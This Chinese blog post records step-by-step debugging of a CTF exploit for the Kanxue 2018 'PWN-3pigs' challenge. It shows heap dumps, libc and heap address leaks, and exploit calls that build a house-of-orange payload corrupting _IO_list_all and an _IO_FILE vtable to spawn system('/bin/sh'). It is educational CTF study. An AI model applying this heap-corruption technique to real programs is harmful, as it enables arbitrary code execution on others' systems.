看雪2018CTF第11题PWN-3pigs之qwertyaa的exp脚本调试记录

1. 概述

看雪2018CTF第11题的网址如下,感兴趣的朋友们可以下载试手。

https://ctf.pediy.com/game-fight-65.htm

此题保护全开

初始会分配内存(chunk_size=0xE20+0x10),专门画了一个猪头

功能分析:

——sub_1897:new pig。最多可创建3个:0,1,2。chunk_size=0xD0

漏洞:可以多写0x10个字节,可以修改下一个chunk的头部。

——sub_19FF:free功能正常。

——sub_1AA1:print pig。只能print一次,且只有new过的才能print

——sub_1B94:new fly pig。chunk_size=0x80,大小无法用来做fastbin attack修改__malloc_hook

——sub_1C52:edit fly pig。漏洞:修改addr+0x80的内容,可以修改下一个chunk的fd和bk。

本题利用的局限性很大,刚开始根本不知道怎么利用,看了各位大佬的wp才知道了house of orange。下面以qwertyaa提供的wp为例,展现调试过程及自己的理解,方便你我这样的小白共同成长。

https://bbs.pediy.com/thread-229647.htm

1).   secret()

pwndbg> x/10gx 0x000055986c0afe40-0x10

0x55986c0afe30:     0x0000000000000000     0x0000000000000081

0x55986c0afe40:     0x0000000000000000     0x0000000000000000

0x55986c0afe50:     0x0000000000000000     0x0000000000000000

0x55986c0afe60:     0x0000000000000000     0x0000000000000000

0x55986c0afe70:     0x0000000000000000     0x0000000000000000


2). create(2,'hello')

pwndbg> x/26gx 0x000055986c0afec0-0x10

0x55986c0afeb0:     0x0000000000000000     0x00000000000000d1

0x55986c0afec0:     0x694c206c6c616d53      0x0000000000000000

0x55986c0afed0:     0x0000006f6c6c6568       0x0000000000000000

0x55986c0afee0:     0x0000000000000000     0x0000000000000000

0x55986c0afef0:      0x0000000000000000     0x0000000000000000

0x55986c0aff00:      0x0000000000000000     0x0000000000000000

0x55986c0aff10:      0x0000000000000000     0x0000000000000000

0x55986c0aff20:      0x0000000000000000     0x0000000000000000

0x55986c0aff30:      0x0000000000000000     0x0000000000000000

0x55986c0aff40:      0x0000000000000000     0x0000000000000000

0x55986c0aff50:      0x0000000000000000     0x0000000000000000

0x55986c0aff60:      0x0000000000000000     0x0000000000000000

0x55986c0aff70:      0x0000000000000000     0x0000000000000000


3). secret()

pwndbg> x/10gx 0x000055986c0aff90-0x10

0x55986c0aff80:      0x0000000000000000     0x0000000000000081

0x55986c0aff90:      0x0000000000000000     0x0000000000000000

0x55986c0affa0:      0x0000000000000000     0x0000000000000000

0x55986c0affb0:      0x0000000000000000     0x0000000000000000

0x55986c0affc0:      0x0000000000000000     0x0000000000000000


4). create(1,'hi')

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x00000000000000d1

0x55986c0b0010:    0x00796f4220646552      0x0000000000000000

0x55986c0b0020:    0x0000000000006968     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000


5). create(0,"hi")

pwndbg> x/26gx 0x000055986c0b00e0-0x10

0x55986c0b00d0:    0x0000000000000000     0x00000000000000d1

0x55986c0b00e0:    0x000061754720654b     0x0000000000000000

0x55986c0b00f0:     0x0000000000006968     0x0000000000000000

0x55986c0b0100:    0x0000000000000000     0x0000000000000000

0x55986c0b0110:    0x0000000000000000     0x0000000000000000

0x55986c0b0120:    0x0000000000000000     0x0000000000000000

0x55986c0b0130:    0x0000000000000000     0x0000000000000000

0x55986c0b0140:    0x0000000000000000     0x0000000000000000

0x55986c0b0150:    0x0000000000000000     0x0000000000000000

0x55986c0b0160:    0x0000000000000000     0x0000000000000000

0x55986c0b0170:    0x0000000000000000     0x0000000000000000

0x55986c0b0180:    0x0000000000000000     0x0000000000000000

0x55986c0b0190:    0x0000000000000000     0x0000000000000000


6). delete(1)

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x00000000000000d1

0x55986c0b0010:    0x00007f0ca8a80b78      0x00007f0ca8a80b78

0x55986c0b0020:    0x0000000000006968     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000

 

由于不与top chunk相连,且size=0xD0,所以待释放空间放入unsorted bin中。

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0b0000 —▸ 0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0b0000

smallbins

empty

largebins

empty


7). delete(2)

pwndbg> x/26gx 0x000055986c0afec0-0x10

0x55986c0afeb0:     0x0000000000000000     0x00000000000000d1

0x55986c0afec0:     0x000055986c0b0000     0x00007f0ca8a80b78

0x55986c0afed0:     0x0000006f6c6c6568       0x0000000000000000

0x55986c0afee0:     0x0000000000000000     0x0000000000000000

0x55986c0afef0:      0x0000000000000000     0x0000000000000000

0x55986c0aff00:      0x0000000000000000     0x0000000000000000

0x55986c0aff10:      0x0000000000000000     0x0000000000000000

0x55986c0aff20:      0x0000000000000000     0x0000000000000000

0x55986c0aff30:      0x0000000000000000     0x0000000000000000

0x55986c0aff40:      0x0000000000000000     0x0000000000000000

0x55986c0aff50:      0x0000000000000000     0x0000000000000000

0x55986c0aff60:      0x0000000000000000     0x0000000000000000

0x55986c0aff70:      0x0000000000000000     0x0000000000000000


同理,放入unsorted bin中。

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0afeb0 —▸ 0x55986c0b0000 —▸0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0afeb0

smallbins

empty

largebins

empty


8).  create(2,"\x00")

unsortedbin遵循先进先出的原则进行分配。

疑问:为什么此时bk位置会有heap上的地址0x000055986c0afeb0?

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x00000000000000d1

0x55986c0b0010:    0x694c206c6c616d53      0x000055986c0afeb0

0x55986c0b0020:    0x0000000000000000     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000


pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0afeb0 —▸ 0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0afeb0

smallbins

empty

largebins

empty


9). delete(0)

待释放空间与top chunk合并

0x55986c0b00d0:    0x00000000000000d0     0x000000000001ff31

0x55986c0b00e0:    0x000061754720654b     0x0000000000000000

0x55986c0b00f0:     0x0000000000006968     0x0000000000000000

0x55986c0b0100:    0x0000000000000000     0x0000000000000000

0x55986c0b0110:    0x0000000000000000     0x0000000000000000

0x55986c0b0120:    0x0000000000000000     0x0000000000000000

0x55986c0b0130:    0x0000000000000000     0x0000000000000000

0x55986c0b0140:    0x0000000000000000     0x0000000000000000

0x55986c0b0150:    0x0000000000000000     0x0000000000000000

0x55986c0b0160:    0x0000000000000000     0x0000000000000000

0x55986c0b0170:    0x0000000000000000     0x0000000000000000

0x55986c0b0180:    0x0000000000000000     0x0000000000000000

0x55986c0b0190:    0x0000000000000000     0x0000000000000000


10). delete(2)

待释放空间与top chunk合并

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x0000000000020001

0x55986c0b0010:    0x694c206c6c616d53      0x000055986c0afeb0

0x55986c0b0020:    0x0000000000000000     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000


11). create(2,"endFlag")

分配unsortedbin中的堆

pwndbg> x/26gx 0x000055986c0afec0-0x10

0x55986c0afeb0:     0x0000000000000000     0x00000000000000d1

0x55986c0afec0:     0x694c206c6c616d53      0x00007f0ca8a80b78

0x55986c0afed0:     0x0067616c46646e65     0x0000000000000000

0x55986c0afee0:     0x0000000000000000     0x0000000000000000

0x55986c0afef0:      0x0000000000000000     0x0000000000000000

0x55986c0aff00:      0x0000000000000000     0x0000000000000000

0x55986c0aff10:      0x0000000000000000     0x0000000000000000

0x55986c0aff20:      0x0000000000000000     0x0000000000000000

0x55986c0aff30:      0x0000000000000000     0x0000000000000000

0x55986c0aff40:      0x0000000000000000     0x0000000000000000

0x55986c0aff50:      0x0000000000000000     0x0000000000000000

0x55986c0aff60:      0x0000000000000000     0x0000000000000000

0x55986c0aff70:      0x0000000000000000     0x0000000000000000


pwndbg> hex 0x000055986c0afec0 0x100

+0000 0x55986c0afec0  53 6d 61 6c 6c 20 4c 69  78 0b a8 a8  0c 7f 00 00 │Smal│l.Li│x...│....│

+0010 0x55986c0afed0  65 6e 64 46 6c 61 67 00  00 00 00 00  00 00 00 00 │endF│lag.│....│....│

+0020 0x55986c0afee0  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

...

+00c0 0x55986c0aff80  d0 00 00 00 00 00 00 00  81 00 00 00 00 00 00 00 │....│....│....│....│

+00d0 0x55986c0aff90  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

...


12). create(1,"endFlag")

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x00000000000000d1

0x55986c0b0010:    0x69796f4220646552      0x000055986c0afeb0

0x55986c0b0020:    0x0067616c46646e65     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000


pwndbg> hex 0x000055986c0b0010 0x100

+0000 0x55986c0b0010  52 65 64 20 42 6f 79 69  b0 fe 0a 6c  98 55 00 00 │Red.│Boyi│...l│.U..│

+0010 0x55986c0b0020  65 6e 64 46 6c 61 67 00  00 00 00 00  00 00 00 00 │endF│lag.│....│....│

+0020 0x55986c0b0030  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

...

+00c0 0x55986c0b00d0  d0 00 00 00 00 00 00 00  31 ff 01 00  00 00 00 00 │....│....│1...│....│

+00d0 0x55986c0b00e0  4b 65 20 47 75 61 00 00  00 00 00 00  00 00 00 00 │Ke.G│ua..│....│....│

+00e0 0x55986c0b00f0  68 69 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │hi..│....│....│....│

+00f0 0x55986c0b0100  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│


ct=show()

pig0还没分配

pig1的数据??不清楚堆地址怎么生成的?

pwndbg> hex 0x000055986c0b0010 0x100

+0000 0x55986c0b0010  52 65 64 20 42 6f 79 69  b0 fe 0a 6c  98 55 0000  │Red.│Boyi│...l│.U..│

+0010 0x55986c0b0020  65 6e 64 46 6c 61 67 00  00 00 00 00  00 00 00 00 │endF│lag.│....│....│

+0020 0x55986c0b0030  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

...

pig2的数据

pwndbg> hex 0x000055986c0afec0-0x100x100

+0000 0x55986c0afeb0  00 00 00 00 00 00 00 00  d1 00 00 00  00 00 00 00 │....│....│....│....│

+0010 0x55986c0afec0  53 6d 61 6c 6c 20 4c 69  78 0b a8 a8  0c 7f 0000  │Smal│l.Li│x...│....│

+0020 0x55986c0afed0  65 6e 64 46 6c 61 67 00  00 00 00 00  00 00 00 00 │endF│lag.│....│....│

+0030 0x55986c0afee0  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│


求出libc_base和heap base

由main_arena+88=0x7f0ca8a80b78  --> libc_base = 0x7f0ca86bc000

由0x55986c0afeb0 – 0xeb0 =heap_base = 0x55986c0af000   ???

(作者的解释:具体值本地cat maps后得出,因为肯定是固定的)


进而算出system、_IO_list_all的地址

sysp=libc_base+dlc.symbols['system']

ilap=libc_base+dlc.symbols['_IO_list_all']   #IO_list_all


13). delete(2)

放入unsortedbin中

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0afeb0 —▸ 0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0afeb0

smallbins

empty

largebins

empty


14). delete(1)

待释放空间放入top chunk中

pwndbg> x/30gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x0000000000020001

0x55986c0b0010:    0x69796f4220646552      0x000055986c0afeb0

0x55986c0b0020:    0x0067616c46646e65     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000

0x55986c0b00d0:    0x00000000000000d0     0x000000000001ff31

0x55986c0b00e0:    0x000061754720654b     0x0000000000000000


15) multiSecret(2)

(1)第1次secret

从unsorted bin里分配堆,将剩余的堆空间放入unsortedbin中

pwndbg> x/26gx  0x55986c0afeb0

0x55986c0afeb0:     0x0000000000000000     0x0000000000000081

0x55986c0afec0:     0x00007f0ca8a80c38       0x00007f0ca8a80c38

0x55986c0afed0:     0x0067616c46646e65     0x0000000000000000

0x55986c0afee0:     0x0000000000000000     0x0000000000000000

0x55986c0afef0:      0x0000000000000000     0x0000000000000000

0x55986c0aff00:      0x0000000000000000     0x0000000000000000

0x55986c0aff10:      0x0000000000000000     0x0000000000000000

0x55986c0aff20:      0x0000000000000000     0x0000000000000000

0x55986c0aff30:      0x0000000000000000     0x0000000000000051

0x55986c0aff40:      0x00007f0ca8a80b78      0x00007f0ca8a80b78

0x55986c0aff50:      0x0000000000000000     0x0000000000000000

0x55986c0aff60:      0x0000000000000000     0x0000000000000000

0x55986c0aff70:      0x0000000000000000     0x0000000000000000


pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0aff30 —▸ 0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0aff30

smallbins

empty

largebins

empty

(2)第2次secret

unsortedbin的堆块大小不够分,仍然在unsortedbin中

pwndbg> x/16gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x0000000000000081

0x55986c0b0010:    0x69796f4220646552      0x000055986c0afeb0

0x55986c0b0020:    0x0067616c46646e65     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000


pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x0

smallbins

0x50: 0x55986c0aff30 —▸ 0x7f0ca8a80bb8 (main_arena+152) ◂—0x55986c0aff30

largebins

empty


#Attack


上述的操作,用来确保接下来申请的内存都在top_chunk中进行。

:由于调试不是一次完成的,因此记录的地址可能前后不一致,但不影响阅读。后3个字节的地址还是保持不变的。


16) create(0,'0'*(0x80-0x10-0x10)+"/bin/sh\x00"+p64(0)*3+p64(2)+p64(3))#pre0x58

pwndbg> x/26gx 0x00005575b6e33090-0x10

0x5575b6e33080:    0x0000000000000000     0x00000000000000d1

0x5575b6e33090:    0x000061754720654b     0x0000000000000000

0x5575b6e330a0:    0x3030303030303030     0x3030303030303030

0x5575b6e330b0:    0x3030303030303030     0x3030303030303030

0x5575b6e330c0:    0x3030303030303030     0x3030303030303030

0x5575b6e330d0:    0x3030303030303030     0x3030303030303030

0x5575b6e330e0:    0x3030303030303030     0x3030303030303030

0x5575b6e330f0:     0x3030303030303030     0x3030303030303030

0x5575b6e33100:    0x0068732f6e69622f       0x0000000000000000    #/bin/sh

0x5575b6e33110:    0x0000000000000000     0x0000000000000000

0x5575b6e33120:    0x0000000000000002     0x0000000000000003

0x5575b6e33130:    0x0000000000000000     0x0000000000000000

0x5575b6e33140:    0x0000000000000000     0x0000000000000000


17) create(1,p64(0)*1+p64(sysp)+"\x00"*0x40+p64(0)*3+p64(he+0x1080+0x80+12*8))#st+0x60

pwndbg> x/26gx 0x00005575b6e33160-0x10

0x5575b6e33150:    0x0000000000000000     0x00000000000000d1

0x5575b6e33160:    0x00796f4220646552      0x0000000000000000

0x5575b6e33170:    0x0000000000000000     0x00007fd1a3e08390   #system

0x5575b6e33180:    0x0000000000000000     0x0000000000000000

0x5575b6e33190:    0x0000000000000000     0x0000000000000000

0x5575b6e331a0:    0x0000000000000000     0x0000000000000000

0x5575b6e331b0:    0x0000000000000000     0x0000000000000000

0x5575b6e331c0:    0x0000000000000000     0x0000000000000000

0x5575b6e331d0:    0x0000000000000000     0x00005575b6e33160   #实验了,此处可为任意值。不清楚在设置设为堆的地址干什么?

0x5575b6e331e0:    0x0000000000000000     0x0000000000000000

0x5575b6e331f0:     0x0000000000000000     0x0000000000000000

0x5575b6e33200:    0x0000000000000000     0x0000000000000000

0x5575b6e33210:    0x0000000000000000     0x0000000000000000


18) create(2,"hi")

pwndbg> x/26gx 0x00005575b6e33230-0x10

0x5575b6e33220:    0x0000000000000000     0x00000000000000d1

0x5575b6e33230:    0x694c206c6c616d53      0x0000000000000000

0x5575b6e33240:    0x0000000000006968     0x0000000000000000

0x5575b6e33250:    0x0000000000000000     0x0000000000000000

0x5575b6e33260:    0x0000000000000000     0x0000000000000000

0x5575b6e33270:    0x0000000000000000     0x0000000000000000

0x5575b6e33280:    0x0000000000000000     0x0000000000000000

0x5575b6e33290:    0x0000000000000000     0x0000000000000000

0x5575b6e332a0:    0x0000000000000000     0x0000000000000000

0x5575b6e332b0:    0x0000000000000000     0x0000000000000000

0x5575b6e332c0:    0x0000000000000000     0x0000000000000000

0x5575b6e332d0:    0x0000000000000000     0x0000000000000000

0x5575b6e332e0:    0x0000000000000000     0x0000000000000000


19) secret()

pwndbg> x/16gx 0x00005575b6e33300-0x10

0x5575b6e332f0:     0x0000000000000000     0x0000000000000081

0x5575b6e33300:    0x0000000000000000     0x0000000000000000

0x5575b6e33310:    0x0000000000000000     0x0000000000000000

0x5575b6e33320:    0x0000000000000000     0x0000000000000000

0x5575b6e33330:    0x0000000000000000     0x0000000000000000

0x5575b6e33340:    0x0000000000000000     0x0000000000000000

0x5575b6e33350:    0x0000000000000000     0x0000000000000000

0x5575b6e33360:    0x0000000000000000     0x0000000000000000


20) delete(2)

待释放的堆块放入unsortedbin中,原来放入unsortedbin中的重新整理后放入smallbins[0x50]

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x5575b6e33220 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33220

smallbins

0x50: 0x5575b6e32f30 —▸ 0x7fd1a4187bb8 (main_arena+152) ◂—0x5575b6e32f30

largebins

empty


21) delete(1)

待释放的块与原unsortedbin中的块相连,合并后重新放入unsortedbin中

wndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x5575b6e33150 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33150

smallbins

0x50: 0x5575b6e32f30 —▸ 0x7fd1a4187bb8 (main_arena+152) ◂—0x5575b6e32f30

largebins

empty


# size=0xD0+0xD0=0x1A0

pwndbg> x/10gx 0x5575b6e33150

0x5575b6e33150:    0x0000000000000000     0x00000000000001a1

0x5575b6e33160:    0x00007fd1a4187b78      0x00007fd1a4187b78

0x5575b6e33170:    0x0000000000000000     0x00007fd1a3e08390

0x5575b6e33180:    0x0000000000000000     0x0000000000000000

0x5575b6e33190:    0x0000000000000000     0x0000000000000000


22) delete(0)

待释放的块与原unsortedbin中的块相连,合并后重新放入unsortedbin中

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x5575b6e33080 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33080

smallbins

0x50: 0x5575b6e32f30 —▸ 0x7fd1a4187bb8 (main_arena+152) ◂—0x5575b6e32f30

largebins

empty


# size=0x1A0+0xD0=0x270

pwndbg> x/10gx 0x5575b6e33080

0x5575b6e33080:    0x0000000000000000     0x0000000000000271

0x5575b6e33090:    0x00007fd1a4187b78      0x00007fd1a4187b78

0x5575b6e330a0:    0x3030303030303030     0x3030303030303030

0x5575b6e330b0:    0x3030303030303030     0x3030303030303030

0x5575b6e330c0:    0x3030303030303030     0x3030303030303030


23) secret()

pwndbg> x/20gx 0x00005575b6e33090-0x10

0x5575b6e33080:    0x0000000000000000     0x0000000000000081

0x5575b6e33090:    0x00007fd1a4187dd8      0x00007fd1a4187dd8

0x5575b6e330a0:    0x3030303030303030     0x3030303030303030

0x5575b6e330b0:    0x3030303030303030     0x3030303030303030

0x5575b6e330c0:    0x3030303030303030     0x3030303030303030

0x5575b6e330d0:    0x3030303030303030     0x3030303030303030

0x5575b6e330e0:    0x3030303030303030     0x3030303030303030

0x5575b6e330f0:     0x3030303030303030     0x3030303030303030

0x5575b6e33100:    0x0068732f6e69622f       0x00000000000001f1

0x5575b6e33110:    0x00007fd1a4187b78      0x00007fd1a4187b78


原来unsortedbin中0x5575b6e33080切掉0x80分给secret后,剩余的0x5575b6e33100放入unsortedbin中

unsortedbin

all: 0x5575b6e33100 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33100


16-23步对应的内存布局如下

24) editSecret(p64(lc+0x3C4B78)+p64(ilap-0x10)[:7])

修改下一个chunk的bk指针,为了house of orange利用时将_IO_list_all指向main_arena+88=0x00007fd1a4187b78

pwndbg> x/20gx 0x00005575b6e33090-0x10

0x5575b6e33080:    0x0000000000000000     0x0000000000000081

0x5575b6e33090:    0x00007fd1a4187dd8      0x00007fd1a4187dd8

0x5575b6e330a0:    0x3030303030303030     0x3030303030303030

0x5575b6e330b0:    0x3030303030303030     0x3030303030303030

0x5575b6e330c0:    0x3030303030303030     0x3030303030303030

0x5575b6e330d0:    0x3030303030303030     0x3030303030303030

0x5575b6e330e0:    0x3030303030303030     0x3030303030303030

0x5575b6e330f0:     0x3030303030303030     0x3030303030303030

0x5575b6e33100:    0x0068732f6e69622f       0x00000000000001f1

0x5575b6e33110:    0x00007fd1a4187b78      0x00007fd1a4188510


unsortedbin

all [corrupted]

FD: 0x5575b6e33100 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33100

BK: 0x5575b6e33100 —▸ 0x7fd1a4188510 ◂—0x0

smallbins

0x50: 0x5575b6e32f30 —▸ 0x7fd1a4187bb8 (main_arena+152) ◂—0x5575b6e32f30

largebins

empty


25) secret()

触发一个申请chunk_size=0x80的空间操作,实施house of orange的后半段攻击。跟踪malloc.c中的_int_malloc

1)修改_IO_list_all指向

unsorted_chunks (av)->bk = bck;

bck->fd = unsorted_chunks (av);

pwndbg> x/gx &_IO_list_all

0x7f32cbfba520 <_IO_list_all>:       0x00007f32cbfb9b78

2)将0x55bf8e8ba100放入smallbins[0x1f0],此时*((main_arena+88)+0x1f0)= 0x55bf8e8ba100

mark_bin (av, victim_index);

victim->bk = bck;

victim->fd = fwd;

fwd->bk = victim;

bck->fd = victim;

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all [corrupted]

FD: 0x55bf8e8ba100 —▸ 0x7f32cbfb9d58 (main_arena+568) ◂—0x55bf8e8ba100

BK: 0x7f32cbfba510 ◂—0x0

smallbins

0x50: 0x55bf8e8b9f30 —▸ 0x7f32cbfb9bb8 (main_arena+152) ◂—0x55bf8e8b9f30

0x1f0: 0x55bf8e8ba100 —▸ 0x7f32cbfb9d58 (main_arena+568) ◂—0x55bf8e8ba100

largebins

empty

从_IO_flush_all_lockp的代码可以看出,首先fp = (_IO_FILE *) _IO_list_all,然后通过

fp =fp->_chain不断地寻找下一个_IO_FILE,

只要fp满足

fp->_mode <= 0 && fp->_IO_write_ptr >fp->_IO_write_base

就能执行到_IO_OVERFLOW,从而转入设定的system(‘/bin/sh’)

本文的利用相比于https://github.com/shellphish/how2heap/blob/master/glibc_2.25/house_of_orange.c而言稍稍变换了一下形式。

github代码是直接将unsorted bin中的堆块头部的size改成了0x61,让执行_int_malloc时将unsortedbin的堆块放入smallbins[0x60]中,从而控制fp->chain的走向。而本题并没修改unsortedbin中堆块的size,因此_int_malloc在整理unsortedbin的块时,将其挪到了smallbins[0x1F0]。但利用本质并没有变化,只是让fp多了几次fp->chain的搜索而已,最终fp->chain会等于0x55bf8e8ba100(即为我们控制的unsortedbin)。


下面直接截图来说明

p (*(struct _IO_FILE *) 0x7f32cbfb9b78)

ok,现在fp->chain=0x55bf8e8ba100,查看下它将vtable改成啥了。

p (*(struct _IO_FILE_plus *) 0x55bf8e8ba100)

其中fp->mode=0, fp->_IO_write_ptr=3, fp->_IO_write_base=2,满足执行_IO_OVERFLOW的前置条件。

vtable指向0x55bf8e8ba160。

p (*(struct _IO_jump_t *) 0x55bf8e8ba160)

__overflow指向了libc_system。

fp=0x55bf8e8ba100的头部指向/bin/sh。因此,_IO_OVERFLOW(fp, EOF)相当于执行system(‘/bin/sh’)

2. 总结

发现qwertyaa与其他大佬的解法不同:没有利用house of orange中的前半段关于top_chunk不够分调用sysmalloc产生一个unsortedbin,仅使用了后半段修改一个unsortedbin和最后申请一个空间的操作。用程序本身的功能直接free出unsorted bin。

跟踪调试后,还是存在一个疑问:不知道基于什么原理才会泄露一个堆地址?且发现exp中的

create(1,p64(0)*1+p64(sysp)+"\x00"*0x40+p64(0)*3+p64(he+0x1080+0x80+12*8))

中给出的这个堆地址没有啥具体作用,house of orange用不到该堆地址。

后来我自己将exp脚本中的这句改成:

create(1,p64(0)*1+p64(sysp)+"\x00"*0x40+p64(0)*4)

也可完美利用。因而引出结论:没必要泄露堆地址,根本用不着。

记录在此,说不定哪天自己就都搞清楚了呢:-)

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,444评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,421评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,036评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,363评论 1 288
